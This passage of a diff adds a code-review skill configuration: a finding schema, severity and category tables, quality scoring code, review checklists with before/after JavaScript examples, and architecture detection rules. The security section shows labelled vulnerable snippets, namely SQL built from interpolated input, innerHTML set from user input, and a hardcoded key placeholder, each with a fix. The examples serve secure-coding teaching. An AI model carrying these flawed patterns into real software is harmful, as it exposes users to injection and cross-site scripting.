  id: string;                      // Unique identifier, e.g. "CORR-001"
  severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
  dimension: string;               // Owning dimension
  category: string;                // Issue category
  file: string;                    // File path
  line?: number;                   // Line number
  column?: number;                 // Column number
  code_snippet?: string;           // Offending code snippet
  description: string;             // Issue description
  recommendation: string;          // Suggested fix
  fix_example?: string;            // Example fix code
  references?: string[];           // Reference links
}

interface ExecutionError {
  action: string;
  message: string;
  timestamp: string;
}
|
||||
```
|
||||
|
||||
## Initial State
|
||||
|
||||
```json
|
||||
{
|
||||
"status": "pending",
|
||||
"started_at": "2024-01-01T00:00:00.000Z",
|
||||
"updated_at": "2024-01-01T00:00:00.000Z",
|
||||
"context": null,
|
||||
"scan_completed": false,
|
||||
"scan_summary": null,
|
||||
"reviewed_dimensions": [],
|
||||
"current_dimension": null,
|
||||
"findings": {
|
||||
"correctness": [],
|
||||
"readability": [],
|
||||
"performance": [],
|
||||
"security": [],
|
||||
"testing": [],
|
||||
"architecture": []
|
||||
},
|
||||
"report_generated": false,
|
||||
"report_path": null,
|
||||
"current_action": null,
|
||||
"completed_actions": [],
|
||||
"errors": [],
|
||||
"error_count": 0,
|
||||
"summary": null
|
||||
}
|
||||
```
|
||||
|
||||
## State Transitions
|
||||
|
||||
```mermaid
|
||||
stateDiagram-v2
|
||||
[*] --> pending: Initialize
|
||||
pending --> running: collect-context
|
||||
running --> running: quick-scan
|
||||
running --> running: deep-review (6x)
|
||||
running --> running: generate-report
|
||||
running --> completed: complete
|
||||
running --> failed: error_count >= 3
|
||||
running --> user_exit: User abort
|
||||
completed --> [*]
|
||||
failed --> [*]
|
||||
user_exit --> [*]
|
||||
```
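The transitions in the diagram can also be checked in code before calling `updateState()`. A minimal sketch; the `canTransition` helper and its lookup table are illustrative, not part of the StateManager API:

```javascript
// Minimal sketch: allowed status transitions, derived from the diagram above.
const ALLOWED_TRANSITIONS = {
  pending: ['running'],
  running: ['running', 'completed', 'failed', 'user_exit'],
  completed: [],
  failed: [],
  user_exit: []
};

function canTransition(fromStatus, toStatus) {
  return (ALLOWED_TRANSITIONS[fromStatus] || []).includes(toStatus);
}
```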
|
||||
|
||||
## Dimension Review Order
|
||||
|
||||
1. **correctness** - Correctness (highest priority)
2. **security** - Security (critical)
3. **performance** - Performance
4. **readability** - Readability
5. **testing** - Test coverage
6. **architecture** - Architectural consistency
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{DIMENSION_PREFIX}-{SEQUENCE}
|
||||
|
||||
Prefixes:
|
||||
- CORR: Correctness
|
||||
- READ: Readability
|
||||
- PERF: Performance
|
||||
- SEC: Security
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Example: SEC-003 = Security issue #3
|
||||
```
|
||||
.claude/skills/review-code/specs/issue-classification.md (new file, 228 lines)
|
||||
# Issue Classification
|
||||
|
||||
Issue classification and severity standards.
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | Determine issue severity | Severity Levels |
| action-generate-report | Present issues by category | Category Mapping |
|
||||
|
||||
---
|
||||
|
||||
## Severity Levels
|
||||
|
||||
### Critical (严重) 🔴
|
||||
|
||||
**定义**: 必须在合并前修复的阻塞性问题
|
||||
|
||||
**标准**:
|
||||
- 安全漏洞 (可被利用)
|
||||
- 数据损坏或丢失风险
|
||||
- 系统崩溃风险
|
||||
- 生产环境重大故障
|
||||
|
||||
**示例**:
|
||||
- SQL/XSS/命令注入
|
||||
- 硬编码密钥泄露
|
||||
- 未捕获的异常导致崩溃
|
||||
- 数据库事务未正确处理
|
||||
|
||||
**响应**: 必须立即修复,阻塞合并
|
||||
|
||||
---
|
||||
|
||||
### High (高) 🟠
|
||||
|
||||
**定义**: 应在合并前修复的重要问题
|
||||
|
||||
**标准**:
|
||||
- 功能缺陷
|
||||
- 重要边界条件未处理
|
||||
- 性能严重退化
|
||||
- 资源泄漏
|
||||
|
||||
**示例**:
|
||||
- 核心业务逻辑错误
|
||||
- 内存泄漏
|
||||
- N+1 查询问题
|
||||
- 缺少必要的错误处理
|
||||
|
||||
**响应**: 强烈建议修复
|
||||
|
||||
---
|
||||
|
||||
### Medium (中) 🟡
|
||||
|
||||
**定义**: 建议修复的代码质量问题
|
||||
|
||||
**标准**:
|
||||
- 代码可维护性问题
|
||||
- 轻微性能问题
|
||||
- 测试覆盖不足
|
||||
- 不符合团队规范
|
||||
|
||||
**示例**:
|
||||
- 函数过长
|
||||
- 命名不清晰
|
||||
- 缺少注释
|
||||
- 代码重复
|
||||
|
||||
**响应**: 建议在后续迭代修复
|
||||
|
||||
---
|
||||
|
||||
### Low (低) 🔵
|
||||
|
||||
**定义**: 可选优化的问题
|
||||
|
||||
**标准**:
|
||||
- 风格问题
|
||||
- 微小优化
|
||||
- 可读性改进
|
||||
|
||||
**示例**:
|
||||
- 变量声明顺序
|
||||
- 额外的空行
|
||||
- 可以更简洁的写法
|
||||
|
||||
**响应**: 可根据团队偏好处理
|
||||
|
||||
---
|
||||
|
||||
### Info (信息) ⚪
|
||||
|
||||
**定义**: 信息性建议,非问题
|
||||
|
||||
**标准**:
|
||||
- 学习机会
|
||||
- 替代方案建议
|
||||
- 文档完善建议
|
||||
|
||||
**示例**:
|
||||
- "这里可以考虑使用新的 API"
|
||||
- "建议添加 JSDoc 注释"
|
||||
- "可以参考 xxx 模式"
|
||||
|
||||
**响应**: 仅供参考
|
||||
|
||||
---
|
||||
|
||||
## Category Mapping
|
||||
|
||||
### By Dimension
|
||||
|
||||
| Dimension | Common Categories |
|
||||
|-----------|-------------------|
|
||||
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
|
||||
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
|
||||
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
|
||||
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
|
||||
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
|
||||
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
|
||||
|
||||
### Category Details
|
||||
|
||||
#### Correctness Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `null-check` | 缺少空值检查 | High |
|
||||
| `boundary` | 边界条件未处理 | High |
|
||||
| `error-handling` | 错误处理不当 | High |
|
||||
| `type-safety` | 类型安全问题 | Medium |
|
||||
| `logic-error` | 逻辑错误 | Critical/High |
|
||||
| `resource-leak` | 资源泄漏 | High |
|
||||
|
||||
#### Security Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `injection` | 注入风险 (SQL/Command) | Critical |
|
||||
| `xss` | 跨站脚本风险 | Critical |
|
||||
| `hardcoded-secret` | 硬编码密钥 | Critical |
|
||||
| `auth` | 认证授权问题 | High |
|
||||
| `sensitive-data` | 敏感数据暴露 | High |
|
||||
| `insecure-dependency` | 不安全依赖 | Medium |
|
||||
|
||||
#### Performance Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `complexity` | 高算法复杂度 | Medium |
|
||||
| `n+1-query` | N+1 查询问题 | High |
|
||||
| `memory-leak` | 内存泄漏 | High |
|
||||
| `blocking-io` | 阻塞 I/O | Medium |
|
||||
| `inefficient-algorithm` | 低效算法 | Medium |
|
||||
| `missing-cache` | 缺少缓存 | Low |
|
||||
|
||||
#### Readability Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `naming` | 命名问题 | Medium |
|
||||
| `function-length` | 函数过长 | Medium |
|
||||
| `nesting-depth` | 嵌套过深 | Medium |
|
||||
| `comments` | 注释问题 | Low |
|
||||
| `duplication` | 代码重复 | Medium |
|
||||
| `magic-number` | 魔法数字 | Low |
|
||||
|
||||
#### Testing Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `coverage` | 测试覆盖不足 | Medium |
|
||||
| `boundary-test` | 缺少边界测试 | Medium |
|
||||
| `mock-abuse` | Mock 过度使用 | Low |
|
||||
| `test-isolation` | 测试不独立 | Medium |
|
||||
| `flaky-test` | 不稳定测试 | High |
|
||||
|
||||
#### Architecture Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `layer-violation` | 层次违规 | Medium |
|
||||
| `circular-dependency` | 循环依赖 | High |
|
||||
| `coupling` | 耦合过紧 | Medium |
|
||||
| `srp-violation` | 单一职责违规 | Medium |
|
||||
| `god-class` | 上帝类 | High |
|
||||
|
||||
---
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{PREFIX}-{NNN}
|
||||
|
||||
Prefixes by Dimension:
|
||||
- CORR: Correctness
|
||||
- SEC: Security
|
||||
- PERF: Performance
|
||||
- READ: Readability
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Examples:
|
||||
- SEC-001: First security finding
|
||||
- CORR-015: 15th correctness finding
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
| Gate | Condition | Action |
|
||||
|------|-----------|--------|
|
||||
| **Block** | Critical > 0 | Merge is blocked |
| **Warn** | High > 0 | Approval required |
| **Pass** | Critical = 0, High = 0 | Merge allowed |
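A minimal sketch of how these gates could be applied to the severity counts in `state.summary` (see `phases/state-schema.md`); the `evaluateQualityGate` helper name and the lowercase gate labels are illustrative:

```javascript
// Minimal sketch: map severity counts to the gates defined above.
function evaluateQualityGate(summary) {
  if (!summary) return 'warn';           // no statistics yet; treat as needing review
  if (summary.critical > 0) return 'block';
  if (summary.high > 0) return 'warn';
  return 'pass';
}
```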
|
||||
|
||||
### Recommended Thresholds
|
||||
|
||||
| Metric | Ideal | Acceptable | Needs Work |
|
||||
|--------|-------|------------|------------|
|
||||
| Critical | 0 | 0 | Any > 0 |
|
||||
| High | 0 | ≤ 2 | > 2 |
|
||||
| Medium | ≤ 5 | ≤ 10 | > 10 |
|
||||
| Total | ≤ 10 | ≤ 20 | > 20 |
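A hedged sketch of how the recommended thresholds could be checked against the same `summary` counts; the helper name and the returned labels are illustrative:

```javascript
// Minimal sketch: rate each metric against the recommended thresholds above.
function classifyAgainstThresholds(summary) {
  const rate = (value, ideal, acceptable) =>
    value <= ideal ? 'ideal' : value <= acceptable ? 'acceptable' : 'needs-work';

  return {
    critical: summary.critical === 0 ? 'ideal' : 'needs-work',
    high: rate(summary.high, 0, 2),
    medium: rate(summary.medium, 5, 10),
    total: rate(summary.total_issues, 10, 20)
  };
}
```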
|
||||
.claude/skills/review-code/specs/quality-standards.md (new file, 214 lines)
|
||||
# Quality Standards
|
||||
|
||||
Quality standards for code review.
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-generate-report | Quality assessment | Quality Dimensions |
| action-complete | Final scoring | Quality Gates |
|
||||
|
||||
---
|
||||
|
||||
## Quality Dimensions
|
||||
|
||||
### 1. Completeness (完整性) - 25%
|
||||
|
||||
**评估审查覆盖的完整程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 所有维度审查完成,所有高风险文件检查 |
|
||||
| 80% | 核心维度完成,主要文件检查 |
|
||||
| 60% | 部分维度完成 |
|
||||
| < 60% | 审查不完整 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 6 个维度全部审查
|
||||
- [ ] 高风险区域重点检查
|
||||
- [ ] 关键文件覆盖
|
||||
|
||||
---
|
||||
|
||||
### 2. Accuracy (准确性) - 25%
|
||||
|
||||
**评估发现问题的准确程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 问题定位准确,分类正确,无误报 |
|
||||
| 80% | 偶有分类偏差,定位准确 |
|
||||
| 60% | 存在误报或漏报 |
|
||||
| < 60% | 准确性差 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 问题行号准确
|
||||
- [ ] 严重程度合理
|
||||
- [ ] 分类正确
|
||||
|
||||
---
|
||||
|
||||
### 3. Actionability (可操作性) - 25%
|
||||
|
||||
**评估建议的实用程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 每个问题都有具体可执行的修复建议 |
|
||||
| 80% | 大部分问题有清晰建议 |
|
||||
| 60% | 建议较笼统 |
|
||||
| < 60% | 缺乏可操作建议 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 提供具体修复建议
|
||||
- [ ] 包含代码示例
|
||||
- [ ] 说明修复优先级
|
||||
|
||||
---
|
||||
|
||||
### 4. Consistency (一致性) - 25%
|
||||
|
||||
**评估审查标准的一致程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 相同问题相同处理,标准统一 |
|
||||
| 80% | 基本一致,偶有差异 |
|
||||
| 60% | 标准不太统一 |
|
||||
| < 60% | 标准混乱 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] ID 格式统一
|
||||
- [ ] 严重程度标准一致
|
||||
- [ ] 描述风格统一
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
### Review Quality Gate
|
||||
|
||||
| Gate | Overall Score | Action |
|
||||
|------|---------------|--------|
|
||||
| **Excellent** | ≥ 90% | High-quality review |
| **Good** | ≥ 80% | Satisfactory review |
| **Acceptable** | ≥ 70% | Minimally acceptable |
| **Needs Improvement** | < 70% | Needs improvement |
|
||||
|
||||
### Code Quality Gate (Based on Findings)
|
||||
|
||||
| Gate | Condition | Recommendation |
|
||||
|------|-----------|----------------|
|
||||
| **Block** | Critical > 0 | Merge blocked; issues must be fixed |
| **Warn** | High > 3 | Needs team discussion |
| **Caution** | Medium > 10 | Improvement recommended |
| **Pass** | otherwise | Safe to merge |
|
||||
|
||||
---
|
||||
|
||||
## Report Quality Checklist
|
||||
|
||||
### Structure
|
||||
|
||||
- [ ] 包含审查概览
|
||||
- [ ] 包含问题统计
|
||||
- [ ] 包含高风险区域
|
||||
- [ ] 包含问题详情
|
||||
- [ ] 包含修复建议
|
||||
|
||||
### Content
|
||||
|
||||
- [ ] 问题描述清晰
|
||||
- [ ] 文件位置准确
|
||||
- [ ] 代码片段有效
|
||||
- [ ] 修复建议具体
|
||||
- [ ] 优先级明确
|
||||
|
||||
### Format
|
||||
|
||||
- [ ] Markdown 格式正确
|
||||
- [ ] 表格对齐
|
||||
- [ ] 代码块语法正确
|
||||
- [ ] 链接有效
|
||||
- [ ] 无拼写错误
|
||||
|
||||
---
|
||||
|
||||
## Validation Function
|
||||
|
||||
```javascript
|
||||
function validateReviewQuality(state) {
|
||||
const scores = {
|
||||
completeness: 0,
|
||||
accuracy: 0,
|
||||
actionability: 0,
|
||||
consistency: 0
|
||||
};
|
||||
|
||||
// 1. Completeness
|
||||
const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
|
||||
scores.completeness = (dimensionsReviewed / 6) * 100;
|
||||
|
||||
// 2. Accuracy (requires human verification or downstream feedback)
|
||||
// For now, estimate from the error count
|
||||
scores.accuracy = state.error_count === 0 ? 100 : Math.max(0, 100 - state.error_count * 20);
|
||||
|
||||
// 3. Actionability
|
||||
const findings = Object.values(state.findings).flat();
|
||||
const withRecommendations = findings.filter(f => f.recommendation).length;
|
||||
scores.actionability = findings.length > 0
|
||||
? (withRecommendations / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// 4. Consistency (check finding ID format, etc.)
|
||||
const validIds = findings.filter(f => /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/.test(f.id)).length;
|
||||
scores.consistency = findings.length > 0
|
||||
? (validIds / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// Overall
|
||||
const overall = (
|
||||
scores.completeness * 0.25 +
|
||||
scores.accuracy * 0.25 +
|
||||
scores.actionability * 0.25 +
|
||||
scores.consistency * 0.25
|
||||
);
|
||||
|
||||
return {
|
||||
scores,
|
||||
overall,
|
||||
gate: overall >= 90 ? 'excellent' :
|
||||
overall >= 80 ? 'good' :
|
||||
overall >= 70 ? 'acceptable' : 'needs_improvement'
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Improvement Recommendations
|
||||
|
||||
### If Completeness is Low
|
||||
|
||||
- 增加扫描的文件范围
|
||||
- 确保所有维度都被审查
|
||||
- 重点关注高风险区域
|
||||
|
||||
### If Accuracy is Low
|
||||
|
||||
- 提高规则精度
|
||||
- 减少误报
|
||||
- 验证行号准确性
|
||||
|
||||
### If Actionability is Low
|
||||
|
||||
- 为每个问题添加修复建议
|
||||
- 提供代码示例
|
||||
- 说明修复步骤
|
||||
|
||||
### If Consistency is Low
|
||||
|
||||
- 统一 ID 格式
|
||||
- 标准化严重程度判定
|
||||
- 使用模板化描述
|
||||
.claude/skills/review-code/specs/review-dimensions.md (new file, 337 lines)
|
||||
# Review Dimensions
|
||||
|
||||
Definitions of the code review dimensions and their checkpoint specifications.
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | Fetch per-dimension check rules | All |
| action-generate-report | Map dimension names | Dimension Names |
|
||||
|
||||
---
|
||||
|
||||
## Dimension Overview
|
||||
|
||||
| Dimension | Weight | Focus | Key Indicators |
|
||||
|-----------|--------|-------|----------------|
|
||||
| **Correctness** | 25% | Functional correctness | Boundary conditions, error handling, type safety |
| **Security** | 25% | Security risks | Injection attacks, sensitive data, permissions |
| **Performance** | 15% | Execution efficiency | Algorithmic complexity, resource usage |
| **Readability** | 15% | Maintainability | Naming, structure, comments |
| **Testing** | 10% | Test quality | Coverage, boundary tests |
| **Architecture** | 10% | Architectural consistency | Layering, dependencies, patterns |
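If per-dimension scores are available (for example, a 0-100 score derived from the findings in each dimension), the weights above can be combined into one overall score. A minimal sketch; the per-dimension scoring input is an assumption, not something the current workflow produces:

```javascript
// Minimal sketch: combine per-dimension scores (0-100) using the weights from the table above.
const DIMENSION_WEIGHTS = {
  correctness: 0.25,
  security: 0.25,
  performance: 0.15,
  readability: 0.15,
  testing: 0.10,
  architecture: 0.10
};

function weightedReviewScore(scoreByDimension) {
  return Object.entries(DIMENSION_WEIGHTS).reduce(
    (total, [dimension, weight]) => total + weight * (scoreByDimension[dimension] ?? 0),
    0
  );
}
```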
|
||||
|
||||
---
|
||||
|
||||
## 1. Correctness (正确性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **边界条件处理**
|
||||
- 空数组/空字符串
|
||||
- Null/Undefined
|
||||
- 数值边界 (0, 负数, MAX_INT)
|
||||
- 集合边界 (首元素, 末元素)
|
||||
|
||||
- [ ] **错误处理**
|
||||
- Try-catch 覆盖
|
||||
- 错误不被静默吞掉
|
||||
- 错误信息有意义
|
||||
- 资源正确释放
|
||||
|
||||
- [ ] **类型安全**
|
||||
- 类型转换正确
|
||||
- 避免隐式转换
|
||||
- TypeScript strict mode
|
||||
|
||||
- [ ] **逻辑完整性**
|
||||
- If-else 分支完整
|
||||
- Switch 有 default
|
||||
- 循环终止条件正确
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 未检查 null
|
||||
function getName(user) {
|
||||
return user.name.toUpperCase(); // user 可能为 null
|
||||
}
|
||||
|
||||
// ✅ 修复
|
||||
function getName(user) {
|
||||
return user?.name?.toUpperCase() ?? 'Unknown';
|
||||
}
|
||||
|
||||
// ❌ 问题: 空 catch 块
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {} // 错误被静默吞掉
|
||||
|
||||
// ✅ 修复
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {
|
||||
console.error('Failed to fetch data:', e);
|
||||
throw e;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Security (安全性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **注入防护**
|
||||
- SQL 注入 (使用参数化查询)
|
||||
- XSS (避免 innerHTML)
|
||||
- 命令注入 (避免 exec)
|
||||
- 路径遍历
|
||||
|
||||
- [ ] **认证授权**
|
||||
- 权限检查完整
|
||||
- Token 验证
|
||||
- Session 管理
|
||||
|
||||
- [ ] **敏感数据**
|
||||
- 无硬编码密钥
|
||||
- 日志不含敏感信息
|
||||
- 传输加密
|
||||
|
||||
- [ ] **依赖安全**
|
||||
- 无已知漏洞依赖
|
||||
- 版本锁定
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: SQL 注入风险
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`;
|
||||
|
||||
// ✅ 修复: 参数化查询
|
||||
const query = `SELECT * FROM users WHERE id = ?`;
|
||||
db.query(query, [userId]);
|
||||
|
||||
// ❌ 问题: XSS 风险
|
||||
element.innerHTML = userInput;
|
||||
|
||||
// ✅ 修复
|
||||
element.textContent = userInput;
|
||||
|
||||
// ❌ 问题: 硬编码密钥
|
||||
const apiKey = 'sk-xxxxxxxxxxxx';
|
||||
|
||||
// ✅ 修复
|
||||
const apiKey = process.env.API_KEY;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Performance (性能)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **算法复杂度**
|
||||
- 避免 O(n²) 在大数据集
|
||||
- 使用合适的数据结构
|
||||
- 避免不必要的循环
|
||||
|
||||
- [ ] **I/O 效率**
|
||||
- 批量操作 vs 循环单条
|
||||
- 避免 N+1 查询
|
||||
- 适当使用缓存
|
||||
|
||||
- [ ] **资源使用**
|
||||
- 内存泄漏
|
||||
- 连接池使用
|
||||
- 大文件流式处理
|
||||
|
||||
- [ ] **异步处理**
|
||||
- 并行 vs 串行
|
||||
- Promise.all 使用
|
||||
- 避免阻塞
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: N+1 查询
|
||||
for (const user of users) {
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
|
||||
}
|
||||
|
||||
// ✅ 修复: 批量查询
|
||||
const userIds = users.map(u => u.id);
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
|
||||
|
||||
// ❌ 问题: 串行执行可并行操作
|
||||
const a = await fetchA();
|
||||
const b = await fetchB();
|
||||
const c = await fetchC();
|
||||
|
||||
// ✅ 修复: 并行执行
|
||||
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Readability (可读性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **命名规范**
|
||||
- 变量名见名知意
|
||||
- 函数名表达动作
|
||||
- 常量使用 UPPER_CASE
|
||||
- 避免缩写和单字母
|
||||
|
||||
- [ ] **函数设计**
|
||||
- 单一职责
|
||||
- 长度 < 50 行
|
||||
- 参数 < 5 个
|
||||
- 嵌套 < 4 层
|
||||
|
||||
- [ ] **代码组织**
|
||||
- 逻辑分组
|
||||
- 空行分隔
|
||||
- Import 顺序
|
||||
|
||||
- [ ] **注释质量**
|
||||
- 解释 WHY 而非 WHAT
|
||||
- 及时更新
|
||||
- 无冗余注释
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 命名不清晰
|
||||
const d = new Date();
|
||||
const a = users.filter(x => x.s === 'active');
|
||||
|
||||
// ✅ 修复
|
||||
const currentDate = new Date();
|
||||
const activeUsers = users.filter(user => user.status === 'active');
|
||||
|
||||
// ❌ 问题: 函数过长、职责过多
|
||||
function processOrder(order) {
|
||||
// ... 200 行代码,包含验证、计算、保存、通知
|
||||
}
|
||||
|
||||
// ✅ 修复: 拆分职责
|
||||
function validateOrder(order) { /* ... */ }
|
||||
function calculateTotal(order) { /* ... */ }
|
||||
function saveOrder(order) { /* ... */ }
|
||||
function notifyCustomer(order) { /* ... */ }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Testing (测试)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **测试覆盖**
|
||||
- 核心逻辑有测试
|
||||
- 边界条件有测试
|
||||
- 错误路径有测试
|
||||
|
||||
- [ ] **测试质量**
|
||||
- 测试独立
|
||||
- 断言明确
|
||||
- Mock 适度
|
||||
|
||||
- [ ] **测试可维护性**
|
||||
- 命名清晰
|
||||
- 结构统一
|
||||
- 避免重复
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 测试不独立
|
||||
let counter = 0;
|
||||
test('increment', () => {
|
||||
counter++; // 依赖外部状态
|
||||
expect(counter).toBe(1);
|
||||
});
|
||||
|
||||
// ✅ 修复: 每个测试独立
|
||||
test('increment', () => {
|
||||
const counter = new Counter();
|
||||
counter.increment();
|
||||
expect(counter.value).toBe(1);
|
||||
});
|
||||
|
||||
// ❌ 问题: 缺少边界测试
|
||||
test('divide', () => {
|
||||
expect(divide(10, 2)).toBe(5);
|
||||
});
|
||||
|
||||
// ✅ 修复: 包含边界情况
|
||||
test('divide by zero throws', () => {
|
||||
expect(() => divide(10, 0)).toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Architecture (架构)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **分层结构**
|
||||
- 层次清晰
|
||||
- 依赖方向正确
|
||||
- 无循环依赖
|
||||
|
||||
- [ ] **模块化**
|
||||
- 高内聚低耦合
|
||||
- 接口定义清晰
|
||||
- 职责单一
|
||||
|
||||
- [ ] **设计模式**
|
||||
- 使用合适的模式
|
||||
- 避免过度设计
|
||||
- 遵循项目既有模式
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 层次混乱 (Controller 直接操作数据库)
|
||||
class UserController {
|
||||
async getUser(req, res) {
|
||||
const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ✅ 修复: 分层清晰
|
||||
class UserController {
|
||||
constructor(private userService: UserService) {}
|
||||
|
||||
async getUser(req, res) {
|
||||
const user = await this.userService.findById(req.params.id);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ❌ 问题: 循环依赖
|
||||
// moduleA.ts
|
||||
import { funcB } from './moduleB';
|
||||
// moduleB.ts
|
||||
import { funcA } from './moduleA';
|
||||
|
||||
// ✅ 修复: 提取共享模块或使用依赖注入
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Severity Mapping
|
||||
|
||||
| Severity | Criteria |
|
||||
|----------|----------|
|
||||
| **Critical** | 安全漏洞、数据损坏风险、崩溃风险 |
|
||||
| **High** | 功能缺陷、性能严重问题、重要边界未处理 |
|
||||
| **Medium** | 代码质量问题、可维护性问题 |
|
||||
| **Low** | 风格问题、优化建议 |
|
||||
| **Info** | 信息性建议、学习机会 |
|
||||
@@ -0,0 +1,63 @@
|
||||
{
|
||||
"dimension": "architecture",
|
||||
"prefix": "ARCH",
|
||||
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
|
||||
"rules": [
|
||||
{
|
||||
"id": "circular-dependency",
|
||||
"category": "dependency",
|
||||
"severity": "high",
|
||||
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
|
||||
"patternType": "regex",
|
||||
"contextPattern": "export.*import.*from.*same-module",
|
||||
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
|
||||
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
|
||||
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
|
||||
},
|
||||
{
|
||||
"id": "god-class",
|
||||
"category": "single-responsibility",
|
||||
"severity": "high",
|
||||
"pattern": "class\\s+\\w+\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"methodThreshold": 15,
|
||||
"lineThreshold": 300,
|
||||
"description": "Class with too many methods or lines violates single responsibility principle",
|
||||
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
|
||||
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
|
||||
},
|
||||
{
|
||||
"id": "layer-violation",
|
||||
"category": "layering",
|
||||
"severity": "high",
|
||||
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["controller", "handler", "route", "component"],
|
||||
"description": "Direct database access from presentation layer violates layered architecture",
|
||||
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
|
||||
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
|
||||
},
|
||||
{
|
||||
"id": "missing-interface",
|
||||
"category": "abstraction",
|
||||
"severity": "medium",
|
||||
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["interface", "implements", "inject"],
|
||||
